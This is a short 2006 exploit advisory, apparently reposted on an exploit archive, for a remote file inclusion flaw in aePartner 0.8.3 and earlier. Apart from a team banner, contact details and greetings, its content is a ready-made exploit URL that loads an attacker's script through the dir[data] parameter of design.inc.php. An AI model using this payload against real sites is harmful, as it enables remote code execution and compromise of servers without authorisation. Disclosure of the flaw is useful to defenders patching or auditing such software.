id: 505
date: 06/09/2006
title: aePartner <= 0.8.3 (dir[data]) Remote Include Vulnerability
author: Kacper
cves: 

===========================================================
aePartner <= 0.8.3 (dir[data]) Remote Include Vulnerability
===========================================================



$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  aePartner (dir[data]) <= v.0.8.3 Remote File Include Vulnerability
$$  Script site: http://www.lovecompass.com/downloads/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[aePartner_path]/inc/design.inc.php?dir[data]=[evil_scripts]


#Pozdro dla wszystkich ;-)


#  0day.today [2023-03-23]  #